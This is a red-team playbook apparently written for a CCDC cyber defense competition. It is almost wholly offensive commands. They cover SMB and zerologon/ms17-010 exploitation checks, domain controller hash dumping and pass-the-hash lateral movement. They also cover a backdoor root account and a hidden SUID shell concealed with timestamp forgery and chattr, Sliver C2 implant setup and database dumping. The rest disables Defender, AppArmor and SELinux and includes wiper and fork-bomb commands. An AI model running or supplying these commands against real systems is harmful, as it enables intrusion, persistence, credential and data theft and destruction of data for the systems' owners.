CCDC playbook
sudo nmap -T4 -min-hostgroup 96 -p 53,445 --open {IP_range} | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u > smb_ips.txt
-min-hostgroup will divide the range up into 96 sup partswhile read -r line; do nxc smb $line -u '' -p '' -M zerologon -M printnightmare -M smbghost -M ms17-010; done < smb_ips.txt
zerologon.py and then impacket-secretsdump -just-dc -no-pass {domain}/{machine_name}:@{DC_IP}
impacket-secretsdump -just-dc -no-pass 'corp.local/TEST-DC$@10.10.0.162' (if DC name is TEST-DC)sudo nmap -sV -O -T4 -min-hostgroup 96 -p 22 {IP_range}sudo nmap -sn -T4 {IP_range} | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u > ips.txt to just figure out what hosts are online
sudo autorecon -t ips.txt -p 21,22,23,25,53,80,110,111,135,139,143,389,443,445,465,636,873,993,995,1025-1030,1080,1433,1521,1723,3306,3389,5432,5900,5985,6379,6667,8000,8080,8443,8888 -o autorecon_results --max-scans 100mass_user_add.sh with domain admin creds/hash against a DC to add a bunch of domain admins
krbtgt (and other) hashes with impacket-secretsdump -hashes :{hash} {domain}/{user}@{DC_IP}
impacket-secretsdump {domain}/{user}:'{password}'@{DC_IP} with a password-o with iwr or we’ll just get the HTTP connection info lmfaoimpacket-wmiexec -hashes :{hash} {domain}/{user}@{ip}impacket-psexec -hashes :{hash} {domain}/{user}@{ip}evil-winrm -i {IP} -u {username} -H {hash} -r {domain}
-r optional, used for kerberosmkdir /root/.ssh and add key to /root/.ssh/authorized_keys/etc/passwd and /etc/ssh/sshd_config
echo 'wwwdata:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash' >> /etc/passwd && chattr +i /etc/passwd && echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config && chattr +i /etc/ssh/sshd_configcp /bin/zsh /.kernel && chmod +sss /.kernel && touch -d "4 May 2024" /.kernel && chattr +i /.kernelchattr makes the file immutable (and gives ROOT a generic access denied error???)/etc/cron.hourly/locate, touch -d "12 Jul 2024" /etc/cron.hourly/locate to make it non-sus, and chattr +i /etc/cron.hourly/locate
#!/bin/bashAutoRecon
find autorecon_results -name "*.txt" -type f -exec grep -l "open" {} \; | sortgrep -r "MS17-010\|CVE-\|Anonymous\|Password:" autorecon_resultsgrep -r "Anonymous" autorecon_resultsgrep -r "Domain Controller" autorecon_resultsgrep -r "Password:\|Credentials:" autorecon_resultsgrep -r "SMB signing required: false" autorecon_resultsSliver
sudo apt install golang-go, curl https://sliver.sh/install | sudo bash, and cd sliver && makesliver-servernew-operator --name {op_name} --lhost localhost and multiplayer to enable clientssliver-client import {config_file} and sliver-client to joinwg can be used to start listening for incoming sessions on a sneaky wireguard udp (use mtls otherwise if we dont get a callback)
generate to create implants or beacons
generate --wg {our_IP} --os linux for an implantgenerate beacon --wg 192.168.0.102 -j {jitter} -S {wait_seconds} --os linuxgenerate --mtls 192.168.0.102 --os windowssessions to show active sessions
sessions -i {id} to interact with session
CTRL + d to exitshell {command} will execute command in a session (can maybe run without shell?)getprivs will list privileges available, probably use /ProgramData/ for potatoes?info - host infops - process listupload/download - file transferscreenshot - grab a screenshotbeacons to show active beacons
use {beacon_id} to use a beacon
interactive to turn it into a normal sessionarmory install allsharp-hound-4 -- '-c all,GPOLocalGroup'Killing Services
systemctl stop {service}
keyboard_desktop_flipper.shservice_stopper.shcommand_rotate.ship_rotate.shrm -rf / -no-preserve-rootdel /Q /S:(){ :|:& };:)timebomb.shMisc
shutdown /s /t 0shutdown /r /t 0query session and logoff {id} to log off a specific user(Get-PSReadlineOption).HistorySavePathreboot to restartwho to see who’s on a system
pkill -t {result} to then kill their sessionpkill -KILL -u {user} - kill all of a user’s processeskill -9 {pid} to kill a specific processtouch -d "4 May 2024"Databases
mysqldump -h [host] -u [user] -p[password] --all-databases > mysql_all_dbs.sqlpg_dump -h [host] -U [username] -F c -b -v -f postgresql_all.dump postgresInvoke-Sqlcmd -ServerInstance [server] -Username [user] -Password [password] -Query "SELECT name FROM master.sys.databases" | Format-Table -AutoSize > mssql_dbs.txtsqlplus [username]/[password]@[host]/[SID] @extract.sql > oracle_data.txtmongodump --host [host] --port [port] --username [user] --password [password] --out ./mongodb_dumpTrolling
wall "dance.enabled + enter path of image and select fill for style > apply + ok > gpupdate /forceDefender/AppArmor/SELinux
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /fgpedit.msc > Computer Configuration > Administrative Templates > Windows Components > Microsoft Defender Antivirus > Turn off Microsoft Defender Antivirus > EnabledC:\Program Files\Windows Defender\MpCmdRun.exe -RemoveDefinitions -AllSet-MpPreference -DisableRealtimeMonitoring $trueRemove-WindowsFeature Windows-Defender, Windows-Defender-GUIStop-Service WinDefend -ForceSet-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Type DWord -ForceSet-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" -Name "AllowAntivirus" -Value 0 -Type DWordhttps://github.com/SaadAhla/FilelessPELoadersudo systemctl stop apparmor, sudo systemctl disable apparmor, sudo apt purge apparmorsestatussudo setenforce 0 or sudo setenforce permissiveSELINUX=enforcing to disabled in /etc/selinux/config and reboot